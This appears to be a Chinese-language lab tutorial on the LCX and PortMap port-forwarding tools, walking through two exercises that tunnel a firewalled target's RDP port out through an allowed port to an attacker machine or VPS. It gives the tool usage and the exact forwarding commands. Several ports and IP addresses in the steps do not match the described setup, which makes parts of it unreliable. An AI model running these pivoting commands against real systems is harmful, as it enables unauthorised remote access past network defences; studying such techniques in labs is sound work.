一、LCX介绍
LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使 用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制。
Windows版的 LCX用法:
端口转发:
Lcx -listen <监听slave请求的端口><等待连接的端口> Lcx -slave <攻击机IP><监听端口><目标IP><目标端口> 端口映射:
Lcx -tran<等待连接的端口><目标IP><日标端口>
Linux版的LCX用法:
Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2
LCX实验一
一、实验场景
由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接是不可以的,就需要使用LCX进行端口转发
Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的53端口,这个 时候攻击者在本地监听53端口并且转发到1111端口,这个时候攻击者连接自己的1111端口,等于访问web服务器 的3389端口
二、实验环境
1、网络拓扑图如下
2、机器介绍如下
机器名称 | IP地址 | 系统版本 | 备注 |
攻击机 | 192.168.101.6 | windows10 | |
靶机 | 192.168.200.129 | windows server 2016 |
三、实验复现
1、在攻击机器上运行以下命令,监听本地53端口并且转发到本地1111端口
lcx -listen 55 1111
2、在web靶机上运行以下命令, 将本地的3389端口转发到192.168.3.27的 53端口
lcx.exe -slave 192.168.1.138 55 127.0.0.1 3389
3、在攻击机器上运行远程桌面,地址为127.0.0.1:1111
LCX实验二
一、实验场景
Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的54端口,这个 时候攻击者在VPS监听54端口并且转发到1111端口,这个时候攻击者连接VPS的1111端口,等于访问web服务器的3389端口
二、实验环境
1、网络拓扑图如下
2、机器介绍如下
机器名称 | IP地址 | 系统版本 | 备注 |
内网攻击机 | 192.168.101.200 | windows10 | |
公网VPS | 120.46.138.91 | Centos7 | |
内网靶机 | 192.168.101.129 | windows server 2016 |
三、实验复现
1、在攻击机器上运行以下命令,监听本地53端口并且转发到本地1111端口
lcx -slave 118.178.134.226 55 127.0.0.1 3389
2、在vps运行lcx -listen 54 1111,因为我的机器vps机器是linux系统所以使用portmap
./portmap -m 2 -p1 55 -p2 1111
3、在那内攻击机器上连接118.178.134.226:1111
© 版权声明
本站所有内容(包括但不限于文字、图片、视频等)均受到版权法保护,归作者所有,未经授权不得转载、复制或用于其他任何商业目的。
转载请注明出处,并保留原文链接。对于未经授权的使用,我们将保留追究法律责任的权利。
THE END
暂无评论内容